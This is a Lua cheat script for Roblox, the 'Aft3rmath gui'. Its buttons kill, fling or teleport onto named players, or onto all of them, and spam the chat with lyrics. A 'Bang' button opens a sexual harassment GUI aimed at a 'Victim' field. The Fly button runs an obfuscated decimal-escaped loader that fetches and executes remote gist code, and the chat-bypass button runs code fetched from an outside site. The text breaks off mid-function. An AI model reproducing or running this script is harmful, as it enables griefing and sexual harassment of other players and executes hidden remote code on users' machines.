-- Gui to Lua
-- Version: 3.2

-- Instances:

local Aft3rnath = Instance.new("ScreenGui")
local Aft3rmath = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local Target = Instance.new("TextBox")
local KillButton = Instance.new("TextButton")
local FlingButton = Instance.new("TextButton")
local GotoButton = Instance.new("TextButton")
local AnnoyButton = Instance.new("TextButton")
local CarpetButton = Instance.new("TextButton")
local ShoulderButton = Instance.new("TextButton")
local OpenCloseLocal1 = Instance.new("TextButton")
local OpenCloseLocal2 = Instance.new("TextButton")
local LocalScriptPage = Instance.new("Frame")
local UICorner_2 = Instance.new("UICorner")
local FlyButton = Instance.new("TextButton")
local ClickTpButton = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local CbypassButton = Instance.new("TextButton")
local BangButton = Instance.new("TextButton")
local ResetButton = Instance.new("TextButton")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local LoadingScreen = Instance.new("Frame")
local Aft3rmathName = Instance.new("TextLabel")
local LoadingBar = Instance.new("Frame")
local Base = Instance.new("Frame")
local UICorner_3 = Instance.new("UICorner")
local UICorner_4 = Instance.new("UICorner")
local UICorner_5 = Instance.new("UICorner")

--Properties:

Aft3rnath.Name = "Aft3rnath"
Aft3rnath.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
Aft3rnath.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Aft3rmath.Name = "Aft3rmath"
Aft3rmath.Parent = Aft3rnath
Aft3rmath.BackgroundColor3 = Color3.fromRGB(52, 52, 52)
Aft3rmath.Position = UDim2.new(-0.000236134976, 0, 0.415711939, 0)
Aft3rmath.Size = UDim2.new(0, 316, 0, 357)
Aft3rmath.Visible = false

UICorner.Parent = Aft3rmath

Target.Name = "Target"
Target.Parent = Aft3rmath
Target.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
Target.Position = UDim2.new(0.181004435, 0, 0.0307535604, 0)
Target.Size = UDim2.new(0, 200, 0, 50)
Target.Font = Enum.Font.SourceSans
Target.PlaceholderColor3 = Color3.fromRGB(255, 0, 0)
Target.PlaceholderText = "Username"
Target.Text = ""
Target.TextColor3 = Color3.fromRGB(255, 0, 0)
Target.TextSize = 25.000
Target.TextWrapped = true

KillButton.Name = "KillButton"
KillButton.Parent = Aft3rmath
KillButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
KillButton.Position = UDim2.new(0.0357142873, 0, 0.196078435, 0)
KillButton.Size = UDim2.new(0, 141, 0, 50)
KillButton.Font = Enum.Font.SourceSans
KillButton.Text = "Kill"
KillButton.TextColor3 = Color3.fromRGB(255, 0, 0)
KillButton.TextSize = 30.000

FlingButton.Name = "FlingButton"
FlingButton.Parent = Aft3rmath
FlingButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
FlingButton.Position = UDim2.new(0.522727251, 0, 0.196078435, 0)
FlingButton.Size = UDim2.new(0, 141, 0, 50)
FlingButton.Font = Enum.Font.SourceSans
FlingButton.Text = "Taze"
FlingButton.TextColor3 = Color3.fromRGB(255, 0, 0)
FlingButton.TextSize = 30.000

GotoButton.Name = "GotoButton"
GotoButton.Parent = Aft3rmath
GotoButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
GotoButton.Position = UDim2.new(0.522727251, 0, 0.389355749, 0)
GotoButton.Size = UDim2.new(0, 141, 0, 50)
GotoButton.Font = Enum.Font.SourceSans
GotoButton.Text = "Goto"
GotoButton.TextColor3 = Color3.fromRGB(255, 0, 0)
GotoButton.TextSize = 30.000

AnnoyButton.Name = "AnnoyButton"
AnnoyButton.Parent = Aft3rmath
AnnoyButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
AnnoyButton.Position = UDim2.new(0.0353854895, 0, 0.389355749, 0)
AnnoyButton.Size = UDim2.new(0, 141, 0, 50)
AnnoyButton.Font = Enum.Font.SourceSans
AnnoyButton.Text = "Annoy"
AnnoyButton.TextColor3 = Color3.fromRGB(255, 0, 0)
AnnoyButton.TextSize = 30.000

CarpetButton.Name = "CarpetButton"
CarpetButton.Parent = Aft3rmath
CarpetButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
CarpetButton.Position = UDim2.new(0.0353854895, 0, 0.571428597, 0)
CarpetButton.Size = UDim2.new(0, 141, 0, 50)
CarpetButton.Font = Enum.Font.SourceSans
CarpetButton.Text = "TpAndDie"
CarpetButton.TextColor3 = Color3.fromRGB(255, 0, 0)
CarpetButton.TextSize = 30.000

ShoulderButton.Name = "ShoulderButton"
ShoulderButton.Parent = Aft3rmath
ShoulderButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
ShoulderButton.Position = UDim2.new(0.522727251, 0, 0.571428597, 0)
ShoulderButton.Size = UDim2.new(0, 141, 0, 50)
ShoulderButton.Font = Enum.Font.SourceSans
ShoulderButton.Text = "Shoulder"
ShoulderButton.TextColor3 = Color3.fromRGB(255, 0, 0)
ShoulderButton.TextSize = 30.000

OpenCloseLocal1.Name = "OpenCloseLocal1"
OpenCloseLocal1.Parent = Aft3rmath
OpenCloseLocal1.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
OpenCloseLocal1.BackgroundTransparency = 1.000
OpenCloseLocal1.BorderColor3 = Color3.fromRGB(27, 42, 53)
OpenCloseLocal1.Position = UDim2.new(0.845387936, 0, 0.0287172198, 0)
OpenCloseLocal1.Size = UDim2.new(0, 39, 0, 50)
OpenCloseLocal1.Font = Enum.Font.SourceSans
OpenCloseLocal1.Text = ">"
OpenCloseLocal1.TextColor3 = Color3.fromRGB(255, 0, 0)
OpenCloseLocal1.TextScaled = true
OpenCloseLocal1.TextSize = 14.000
OpenCloseLocal1.TextWrapped = true

OpenCloseLocal2.Name = "OpenCloseLocal2"
OpenCloseLocal2.Parent = Aft3rmath
OpenCloseLocal2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
OpenCloseLocal2.BackgroundTransparency = 1.000
OpenCloseLocal2.BorderColor3 = Color3.fromRGB(27, 42, 53)
OpenCloseLocal2.Position = UDim2.new(0.845387936, 0, 0.0287172198, 0)
OpenCloseLocal2.Size = UDim2.new(0, 39, 0, 50)
OpenCloseLocal2.Visible = false
OpenCloseLocal2.Font = Enum.Font.SourceSans
OpenCloseLocal2.Text = "<"
OpenCloseLocal2.TextColor3 = Color3.fromRGB(255, 0, 0)
OpenCloseLocal2.TextScaled = true
OpenCloseLocal2.TextSize = 14.000
OpenCloseLocal2.TextWrapped = true

LocalScriptPage.Name = "LocalScriptPage"
LocalScriptPage.Parent = Aft3rmath
LocalScriptPage.BackgroundColor3 = Color3.fromRGB(52, 52, 52)
LocalScriptPage.Position = UDim2.new(0.998694241, 0, -0.00165501237, 0)
LocalScriptPage.Size = UDim2.new(0, 293, 0, 270)
LocalScriptPage.Visible = false

UICorner_2.Parent = LocalScriptPage

FlyButton.Name = "FlyButton"
FlyButton.Parent = LocalScriptPage
FlyButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
FlyButton.Position = UDim2.new(0.0386822298, 0, 0.0392215289, 0)
FlyButton.Size = UDim2.new(0, 129, 0, 50)
FlyButton.Font = Enum.Font.SourceSans
FlyButton.Text = "Fly"
FlyButton.TextColor3 = Color3.fromRGB(255, 0, 0)
FlyButton.TextSize = 30.000

ClickTpButton.Name = "ClickTpButton"
ClickTpButton.Parent = LocalScriptPage
ClickTpButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
ClickTpButton.Position = UDim2.new(0.0386822298, 0, 0.261443764, 0)
ClickTpButton.Size = UDim2.new(0, 129, 0, 50)
ClickTpButton.Font = Enum.Font.SourceSans
ClickTpButton.Text = "ClickTp"
ClickTpButton.TextColor3 = Color3.fromRGB(255, 0, 0)
ClickTpButton.TextSize = 30.000

TextLabel.Parent = LocalScriptPage
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.402730376, 0, 0.259259224, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Coming soon..."
TextLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
TextLabel.TextSize = 14.000

CbypassButton.Name = "CbypassButton"
CbypassButton.Parent = LocalScriptPage
CbypassButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
CbypassButton.Position = UDim2.new(0.53356272, 0, 0.0392215401, 0)
CbypassButton.Size = UDim2.new(0, 124, 0, 50)
CbypassButton.Font = Enum.Font.SourceSans
CbypassButton.Text = "Cbypass"
CbypassButton.TextColor3 = Color3.fromRGB(255, 0, 0)
CbypassButton.TextSize = 30.000

BangButton.Name = "BangButton"
BangButton.Parent = Aft3rmath
BangButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
BangButton.Position = UDim2.new(0.0353854708, 0, 0.753501415, 0)
BangButton.Size = UDim2.new(0, 141, 0, 50)
BangButton.Font = Enum.Font.SourceSans
BangButton.Text = "Bang"
BangButton.TextColor3 = Color3.fromRGB(255, 0, 0)
BangButton.TextSize = 30.000

ResetButton.Name = "ResetButton"
ResetButton.Parent = Aft3rmath
ResetButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
ResetButton.Position = UDim2.new(0.522727251, 0, 0.753501415, 0)
ResetButton.Size = UDim2.new(0, 141, 0, 50)
ResetButton.Font = Enum.Font.SourceSans
ResetButton.Text = "Reset"
ResetButton.TextColor3 = Color3.fromRGB(255, 0, 0)
ResetButton.TextSize = 30.000

TextLabel_2.Parent = Aft3rmath
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.183544278, 0, 0.859943986, 0)
TextLabel_2.Size = UDim2.new(0, 200, 0, 50)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Made by Neon#2680 / Unlversal_cha0s"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 0, 0)
TextLabel_2.TextSize = 14.000

TextLabel_3.Parent = Aft3rmath
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.183544278, 0, 0.893557429, 0)
TextLabel_3.Size = UDim2.new(0, 200, 0, 50)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Aft3rmath gui"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 0, 0)
TextLabel_3.TextSize = 14.000

LoadingScreen.Name = "LoadingScreen"
LoadingScreen.Parent = Aft3rnath
LoadingScreen.BackgroundColor3 = Color3.fromRGB(52, 52, 52)
LoadingScreen.Position = UDim2.new(0.306422025, 0, 0.435351878, 0)
LoadingScreen.Size = UDim2.new(0.386238545, 0, 0.128072083, 0)

Aft3rmathName.Name = "Aft3rmathName"
Aft3rmathName.Parent = LoadingScreen
Aft3rmathName.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Aft3rmathName.BackgroundTransparency = 1.000
Aft3rmathName.Position = UDim2.new(0.193376064, 0, 0.0934393629, 0)
Aft3rmathName.Size = UDim2.new(0.613247871, 0, 0.151093438, 0)
Aft3rmathName.Font = Enum.Font.Highway
Aft3rmathName.Text = "Loading Aft3rmath"
Aft3rmathName.TextColor3 = Color3.fromRGB(255, 0, 0)
Aft3rmathName.TextSize = 25.000
Aft3rmathName.TextWrapped = true

LoadingBar.Name = "LoadingBar"
LoadingBar.Parent = LoadingScreen
LoadingBar.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
LoadingBar.BorderSizePixel = 4
LoadingBar.Position = UDim2.new(0.176282048, 0, 0.427435398, 0)
LoadingBar.Size = UDim2.new(0.64636755, 0, 0.14314115, 0)

Base.Name = "Base"
Base.Parent = LoadingBar
Base.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Base.BorderSizePixel = 0
Base.Size = UDim2.new(0, 0, 1, 0)

UICorner_3.CornerRadius = UDim.new(0, 15)
UICorner_3.Parent = Base

UICorner_4.CornerRadius = UDim.new(0, 15)
UICorner_4.Parent = LoadingBar

UICorner_5.CornerRadius = UDim.new(0, 15)
UICorner_5.Parent = LoadingScreen

-- Scripts:

local function TVQZTUM_fake_script() -- KillButton.LocalScript 
	local script = Instance.new('LocalScript', KillButton)

	local lplayer = game:GetService('Players').LocalPlayer
	local Target = script.Parent.Parent.Target
	local kill = false
	function GetPlayer(String)
		local Found = {}
		local strl = String:lower()
		if strl == "all" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				table.insert(Found,v)
			end
		elseif strl == "others" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name ~= lplayer.Name then
					table.insert(Found,v)
				end
			end 
		elseif strl == "me" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name == lplayer.Name then
					table.insert(Found,v)
				end
			end 
		else
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name:lower():sub(1, #String) == String:lower() then
					table.insert(Found,v)
				end
			end 
		end
		return Found 
	end
	
	
	script.Parent.MouseButton1Click:Connect(function()
		local target = unpack(GetPlayer(Target.Text)).Character
	
		lplayer.Character.Humanoid.PlatformStand = true
		kill = true
		local coin = Instance.new('BodyThrust',lplayer.Character.HumanoidRootPart)
		coin.Force = Vector3.new(18000,18000,18000)
		coin.Name = "yeetforce"
		repeat lplayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame;coin.Location = target.Head.Position game:GetService('RunService').Heartbeat:wait() until not target.Head or kill == false
	end)
end
coroutine.wrap(TVQZTUM_fake_script)()
local function WVBUPUK_fake_script() -- FlingButton.LocalScript 
	local script = Instance.new('LocalScript', FlingButton)

	local lplayer = game:GetService('Players').LocalPlayer
	local Target = script.Parent.Parent.Target
	local kill = false
	function GetPlayer(String)
		local Found = {}
		local strl = String:lower()
		if strl == "all" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				table.insert(Found,v)
			end
		elseif strl == "others" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name ~= lplayer.Name then
					table.insert(Found,v)
				end
			end 
		elseif strl == "me" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name == lplayer.Name then
					table.insert(Found,v)
				end
			end 
		else
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name:lower():sub(1, #String) == String:lower() then
					table.insert(Found,v)
				end
			end 
		end
		return Found 
	end
	
	
	script.Parent.MouseButton1Click:Connect(function()
		local target = unpack(GetPlayer(Target.Text)).Character
	
		lplayer.Character.Humanoid.PlatformStand = true
		kill = true
		local coin = Instance.new('BodyThrust',lplayer.Character.HumanoidRootPart)
		coin.Force = Vector3.new(50,50,50)
		coin.Name = "yeetforce"
		repeat lplayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame;coin.Location = target.Head.Position game:GetService('RunService').Heartbeat:wait() until not target.Head or kill == false
	end)
end
coroutine.wrap(WVBUPUK_fake_script)()
local function WBND_fake_script() -- GotoButton.LocalScript 
	local script = Instance.new('LocalScript', GotoButton)

	local lplayer = game:GetService('Players').LocalPlayer
	local Target = script.Parent.Parent.Target
	function GetPlayer(String)
		local Found = {}
		local strl = String:lower()
		if strl == "all" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				table.insert(Found,v)
			end
		elseif strl == "others" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name ~= lplayer.Name then
					table.insert(Found,v)
				end
			end 
		elseif strl == "me" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name == lplayer.Name then
					table.insert(Found,v)
				end
			end 
		else
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name:lower():sub(1, #String) == String:lower() then
					table.insert(Found,v)
				end
			end 
		end
		return Found 
	end
	
	
	script.Parent.MouseButton1Click:Connect(function()
		local target = unpack(GetPlayer(Target.Text)).Character
	
		
		local coin = Instance.new('BodyThrust',lplayer.Character.HumanoidRootPart)
	    lplayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame;coin.Location = target.Head.Position
	end)
end
coroutine.wrap(WBND_fake_script)()
local function KKGZYR_fake_script() -- AnnoyButton.LocalScript 
	local script = Instance.new('LocalScript', AnnoyButton)

	script.Parent.MouseButton1Click:Connect(function()
		local A_1 = "We're no strangers to love You know the rules and so do I A full commitment's what I'm thinking of You wouldn't get this from any other guy" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "You know the rules and so do I" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "A full commitment's what I'm thinking of" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "You wouldn't get this from any other guy" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "I just wanna tell you how I'm feeling" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "Gotta make you understand Never gonna give you up Never gonna let you down Never gonna run around and desert you Never gonna make you cry Never gonna say goodbye Never gonna tell a lie and hurt you" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "We've known each other for so long Your heart's been aching but you're too shy to say it Inside we both know what's been going on We know the game and we're gonna play it And if you ask me how I'm feeling Don't tell me you're too blind to see" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "Never gonna give you up Never gonna let you down Never gonna run around and desert you Never gonna make you cry Never gonna say goodbye Never gonna tell a lie and hurt you" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "Never gonna give you up Never gonna let you down Never gonna run around and desert you Never gonna make you cry Never gonna say goodbye Never gonna tell a lie and hurt you" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "(Give you up) (Ooh) Never gonna give, never gonna give (Give you up) We've known each other for so long Your heart's been aching but you're too shy to say it Inside we both know what's been going on We know the game and we're gonna play it I just wanna tell you how I'm feeling Gotta make you understand" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "Never gonna give you up Never gonna let you down Never gonna run around and desert you Never gonna make you cry Never gonna say goodbye Never gonna tell a lie and hurt you" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "Never gonna give you up Never gonna let you down Never gonna run around and desert you Never gonna make you cry Never gonna say goodbye Never gonna tell a lie and hurt you" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
		local A_1 = "Never gonna give you up Never gonna let you down Never gonna run around and desert you Never gonna make you cry Never gonna say goodbye" local A_2 = "All" 
		local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest Event:FireServer(A_1, A_2)
		wait(2)
	end)
	
end
coroutine.wrap(KKGZYR_fake_script)()
local function JTQOIOK_fake_script() -- AnnoyButton.LocalScript 
	local script = Instance.new('LocalScript', AnnoyButton)

	script.Parent.MouseButton1Click:Connect(function()
		local Players = game:GetService("Players")
		local LocalPlayer = Players.LocalPlayer
		local function RemoveSpaces(String)
			return String:gsub("%s+", "") or String
		end
	
		local function FindPlayer(String)
			String = RemoveSpaces(String)
			for _, _Player in pairs(Players:GetPlayers()) do
				if _Player.Name:lower():match('^'.. String:lower()) then
					return _Player
				end
			end
			return nil
		end
	
		local target = script.Parent.Parent.Target
	
		script.Parent.MouseButton1Click:Connect(function()
			local Target = FindPlayer(target.Text)
			if Target and Target.Character then
				local Character = LocalPlayer.Character or LocalPlayer.CharacterAdded:Wait()
				local Torso = Character:FindFirstChild("Torso") or Character:FindFirstChild("UpperTorso")
	
				local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame
				Torso.Anchored = true
				local tool = Instance.new("Tool", LocalPlayer.Backpack)
				local hat = LocalPlayer.Character:FindFirstChildOfClass("Accessory")
				local hathandle = hat.Handle
				hathandle.Parent = tool
				hathandle.Massless = true
				tool.GripPos = Vector3.new(0, 9e99, 0)
				tool.Parent = LocalPlayer.Character
				repeat wait() until LocalPlayer.Character:FindFirstChildOfClass("Tool") ~= nil
				tool.Grip = CFrame.new(Vector3.new(0, 0, 0))
				Torso.Anchored = false
				repeat LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = Target.Character:FindFirstChild("HumanoidRootPart").CFrame wait()
				until Target.Character == nil or Target.Character:FindFirstChild("Humanoid").Health <= 0 or LocalPlayer.Character == nil or LocalPlayer.Character:FindFirstChild("Humanoid").Health <= 0 or (Target.Character:FindFirstChild("HumanoidRootPart").Velocity.magnitude - Target.Character:FindFirstChild("Humanoid").WalkSpeed) > (Target.Character:FindFirstChild("Humanoid").WalkSpeed + 20)
				LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools()
				hathandle.Parent = hat
				hathandle.Massless = false
				tool:Destroy()
				LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos
			else
				warn'no player found named like that or he has no char'
			end
		end)
	
	end)
	
end
coroutine.wrap(JTQOIOK_fake_script)()
local function REDCK_fake_script() -- CarpetButton.LocalScript 
	local script = Instance.new('LocalScript', CarpetButton)

	local lplayer = game:GetService('Players').LocalPlayer
	local Target = script.Parent.Parent.Target
	local kill = false
	function GetPlayer(String)
		local Found = {}
		local strl = String:lower()
		if strl == "all" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				table.insert(Found,v)
			end
		elseif strl == "others" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name ~= lplayer.Name then
					table.insert(Found,v)
				end
			end 
		elseif strl == "me" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name == lplayer.Name then
					table.insert(Found,v)
				end
			end 
		else
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name:lower():sub(1, #String) == String:lower() then
					table.insert(Found,v)
				end
			end 
		end
		return Found 
	end
	
	
	script.Parent.MouseButton1Click:Connect(function()
		local target = unpack(GetPlayer(Target.Text)).Character
	
		lplayer.Character.Humanoid.PlatformStand = true
		local coin = Instance.new('BodyThrust',lplayer.Character.HumanoidRootPart)
	    lplayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame;coin.Location = target.Head.Position
	end)
end
coroutine.wrap(REDCK_fake_script)()
local function TKHC_fake_script() -- ShoulderButton.LocalScript 
	local script = Instance.new('LocalScript', ShoulderButton)

	local lplayer = game:GetService('Players').LocalPlayer
	local Target = script.Parent.Parent.Target
	local kill = false
	function GetPlayer(String)
		local Found = {}
		local strl = String:lower()
		if strl == "all" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				table.insert(Found,v)
			end
		elseif strl == "others" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name ~= lplayer.Name then
					table.insert(Found,v)
				end
			end 
		elseif strl == "me" then
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name == lplayer.Name then
					table.insert(Found,v)
				end
			end 
		else
			for i,v in pairs(game:GetService("Players"):GetPlayers()) do
				if v.Name:lower():sub(1, #String) == String:lower() then
					table.insert(Found,v)
				end
			end 
		end
		return Found 
	end
	
	
	script.Parent.MouseButton1Click:Connect(function()
		local target = unpack(GetPlayer(Target.Text)).Character
	
		lplayer.Character.Humanoid.PlatformStand = true
		kill = true
		local coin = Instance.new('BodyThrust',lplayer.Character.HumanoidRootPart)
		repeat lplayer.Character.HumanoidRootPart.CFrame = target.Head.CFrame;coin.Location = target.Head.Position game:GetService('RunService').Heartbeat:wait() until not target.Head or kill == false
	end)
end
coroutine.wrap(TKHC_fake_script)()
local function AWJGC_fake_script() -- OpenCloseLocal1.LocalScript 
	local script = Instance.new('LocalScript', OpenCloseLocal1)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.LocalScriptPage.Visible = true
		script.Parent.Parent.OpenCloseLocal2.Visible = true
		script.Parent.Parent.OpenCloseLocal1.Visible = false
	end)
end
coroutine.wrap(AWJGC_fake_script)()
local function RUJFG_fake_script() -- OpenCloseLocal2.LocalScript 
	local script = Instance.new('LocalScript', OpenCloseLocal2)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.LocalScriptPage.Visible = false
		script.Parent.Parent.OpenCloseLocal2.Visible = false
		script.Parent.Parent.OpenCloseLocal1.Visible = true
	end)
end
coroutine.wrap(RUJFG_fake_script)()
local function YUVQR_fake_script() -- FlyButton.FlyLocal 
	local script = Instance.new('LocalScript', FlyButton)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
	
	end)
end
coroutine.wrap(YUVQR_fake_script)()
local function ZPXN_fake_script() -- ClickTpButton.FlyLocal 
	local script = Instance.new('LocalScript', ClickTpButton)

	script.Parent.MouseButton1Click:Connect(function()
		mouse = game.Players.LocalPlayer:GetMouse()
		tool = Instance.new("Tool")
		tool.RequiresHandle = false
		tool.Name = "Click Teleport"
		tool.Activated:connect(function()
			local pos = mouse.Hit+Vector3.new(0,2.5,0)
			pos = CFrame.new(pos.X,pos.Y,pos.Z)
			game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
		end)
		tool.Parent = game.Players.LocalPlayer.Backpack
	end)
end
coroutine.wrap(ZPXN_fake_script)()
local function DPPGRD_fake_script() -- CbypassButton.FlyLocal 
	local script = Instance.new('LocalScript', CbypassButton)

	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://the-shed.xyz/roblox/scripts/ChatBypass", true))()
	end)
end
coroutine.wrap(DPPGRD_fake_script)()
local function IZYSRV_fake_script() -- BangButton.LocalScript 
	local script = Instance.new('LocalScript', BangButton)

	script.Parent.MouseButton1Click:Connect(function()
		local SimpleSexGUI = Instance.new("ScreenGui")
	
		local FGUI = Instance.new("Frame")
	
		local btnNaked = Instance.new("TextButton")
	
		local btnSex = Instance.new("TextButton")
	
		local tbxVictim = Instance.new("TextBox")
	
		local lblFUCKEMALL = Instance.new("TextLabel")
	
		local lbltitle = Instance.new("TextLabel")
	
		local TextLabel = Instance.new("TextLabel")
	
	
	
	
	
	
	
	
		--Properties
	
		SimpleSexGUI.Name = "SimpleSexGUI"
		SimpleSexGUI.Parent = game.CoreGui
	
	
		FGUI.Name = "FGUI"
		FGUI.Parent = SimpleSexGUI
		FGUI.BackgroundColor3 = Color3.new(0.207843, 0.207843, 0.207843)
		FGUI.BorderSizePixel = 1
		FGUI.Position = UDim2.new(0,0, 0.667, 0)
		FGUI.Size = UDim2.new(0,317, 0,271)
		FGUI.Draggable = true
	
	
	
		lbltitle.Name = "Title"
		lbltitle.Parent = FGUI
		lbltitle.BackgroundColor3 = Color3.new(0.207843, 0.207843, 0.207843)
		lbltitle.BorderSizePixel = 1
		lbltitle.Position = UDim2.new (0, 0,-0.122, 0)
		lbltitle.Size = UDim2.new (0, 317,0, 33)
		lbltitle.Visible = true
		lbltitle.Active = true
		lbltitle.Draggable = false
		lbltitle.Selectable = true
		lbltitle.Font = Enum.Font.SourceSansBold
		lbltitle.Text = "A Simple Fuck(ing) GUI!!"
		lbltitle.TextColor3 = Color3.new(1, 0, 0)
		lbltitle.TextSize = 20
	
	
	
	
	
		btnSex.Name = "Sex"
		btnSex.Parent = FGUI
		btnSex.BackgroundColor3 = Color3.new(0.207843, 0.207843, 0.207843)
		btnSex.BorderSizePixel = 1
		btnSex.Position = UDim2.new (0.044, 0,0.229, 0)
		btnSex.Size = UDim2.new (0, 99,0, 31)
		btnSex.Visible = true
		btnSex.Active = true
		btnSex.Draggable = false
		btnSex.Selectable = true
		btnSex.Font = Enum.Font.SourceSansBold
		btnSex.Text = "Let's FUCK!!"
		btnSex.TextColor3 = Color3.new(1, 0, 0)
		btnSex.TextSize = 20
	
	
	
	
		tbxVictim.Name = "VictimTEXT"
		tbxVictim.Parent = FGUI
